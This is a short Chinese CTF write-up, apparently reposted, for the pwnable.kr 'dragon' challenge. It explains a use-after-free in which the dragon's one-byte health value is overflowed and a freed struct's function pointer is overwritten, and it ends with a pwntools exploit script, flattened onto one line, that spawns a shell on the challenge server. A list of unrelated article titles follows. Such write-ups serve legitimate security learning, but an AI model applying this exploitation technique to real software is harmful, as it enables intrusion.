pwnable dragon
来源:互联网 发布:html5权威指南 知乎 编辑:程序博客网 时间:2024/06/05 06:19
借着这段时间学UAF,又找了一道UAF的题目做了一下,这个题目很简单,看着WP写的,思路也非常的清晰。
题目地址:
nc pwnable.kr 9004
题目下载:
http://pwnable.kr/bin/dragon
0x01 简单分析
这题是让我们打龙,首先利用IDA查看龙的相关信息
上面是两个龙的结构体
又发现了一个神秘关卡
里面有要获取的shell
发现在杀死龙之后会释放龙内存,同时也会重新申请相同大小的内存进行写入而且偏移量正好是龙结构体的函数指针处。这样我们就能利用UAF(释放重利用)控制整个程序流。下面第一个难题是怎样杀死一条龙。
0x02 屠龙
Priest
Knight
我们发现如果是直接想把龙打死是不可能的但是我们发现了一个技能Priest的3技能
可以是龙的回升.同时发现大龙的血是80 一个字节127可以使其溢出,从而把大龙打死。
0x03 编写exp
from pwn import *sh = remote('pwnable.kr',9004) #process('./dragon')def killself(sh): for i in range(0,3): sh.send('1'+'\n')def killdragon(sh): for i in range(0,4): sh.send('3'+'\n') sh.send('3'+'\n') sh.send('2'+'\n') killself(sh)sh.send('1'+'\n')killdragon(sh)sh.send(p32(0x08048DBF))sh.interactive()
阅读全文
0 0
- pwnable dragon
- pwnable之dragon
- pwnable.kr
- pwnable.kr
- pwnable.kr
- Chinese Dragon
- Dragon temple
- Dragon Balls
- Dragon Balls
- Dragon Balls
- Dragon Balls
- DRAGON POSTMESSAGE
- Dragon Balls
- ZCTF2017 dragon
- pwnable.kr - fd
- pwnable.kr collision
- pwnable之coin1
- pwnable之blackjack
- 无线网络覆盖
- python3 [入门基础实战] 爬虫入门之爬取豆瓣读书随笔页面
- gulp
- 【1002】等价二叉树
- Java程序员应该知道的10个调试技巧
- pwnable dragon
- 葵花宝典第一天
- NodeJS
- android 设备唯一码的获取,Cpu号,Mac地址
- 面试题总结
- Android 学习资料汇总
- 成功转型机器学习,多年的经验分享
- iOS 学习资料整理
- Linux基本命令